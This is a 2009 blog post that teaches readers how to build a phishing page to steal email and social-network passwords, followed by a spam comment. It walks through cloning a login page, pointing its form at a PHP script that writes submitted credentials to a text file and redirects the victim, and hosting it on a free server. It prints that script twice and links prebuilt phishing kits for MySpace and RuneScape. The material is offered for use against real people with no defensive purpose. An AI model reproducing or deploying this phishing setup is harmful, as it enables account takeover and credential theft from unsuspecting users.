Thursday, July 23, 2009

Hack orkut/email account password by phishing.

The phishing method is useful in hacking most accounts like gmail, yahoo, aol, photobucket, flicker, rediffmail, orkut, hotmail, myspace, youtube, twitter etc.

All right lets get started!

1. First things first you must choose the site which you wanna make a phisher from.

2. When you found your site right click on it and say "view source" and save it on desktop as index.htm

3. Open the "index.htm" with notepad and find search the source for the word "action". you should find a command looking like this

or anything alike.

4. change the url (in this case "RANDOM URL") to "next.php"

5. Save index.htm

6. Time to create a free website. It MUST SUPPORT .php files so i suggest the use of http://www.110mb.com. Create a free website.

7. login to your website and go to "file manager"

8. delete the file thats already there called "index.htm" and upload your "index.htm" (the one you just made)

9. Create a new file called next.php and copy / paste this:

header("Location: http://WEBSITE ");
$handle =

fopen("pass.txt", "a");
foreach($_GET as

$variable => $value) {
fwrite($handle,

$variable);
fwrite($handle, "=");

fwrite($handle, $value);
fwrite($handle,

"\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;



10.Use approapriate php tags at start and end. Switch out the word "WEBSITE" with the site the browser should go to after victim wrote his/her password. so it should say like this:
header("Location: http://hotmail.com ");

11. Save this file (next.php)

12. Create a new file called "pass.txt". dont write anything in it. just save it empty. Your done making your phising site!

13. test out your website. type in something in your phisher and then go to filemanager and open "pass.txt" what you wrote should be typed here!

14. if its not typed there you should try editing "next.php" and enter this instead:

header("Location: http://RANDOM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;

As you have done above, use approapriate php tags at start and end and i think you know what to do with the "RANDOM" url.

NOTE: IF YOU USE THE SECOND CODE, YOU MUST SAVE THE TXT. FILE "password.txt" instead of "pass.txt"

15. For the lazy ones i have already made phisher files for

MySpace
http://rapidshare.com/files/98535940/Mys...r.zip.html

RuneScape
http://rapidshare.com/files/98536099/Run...r.zip.html

16. just upload all the files in the folder to the file manager and the phisher is ready for use!


I have found this phishing hack working well for me..just report your view by commenting or by simply mailing me. So guys, enjoy hacking email account passwords by phishing.

Enjoy HaCkInG.....

1 comment:

  1. There are many emails on my computer. But some of them were destroyed couple days ago. I decided to use the Google and was right. I discovered - recover messages from outlook express there. It settled my trouble quite rapidly and without my money!!!

    ReplyDelete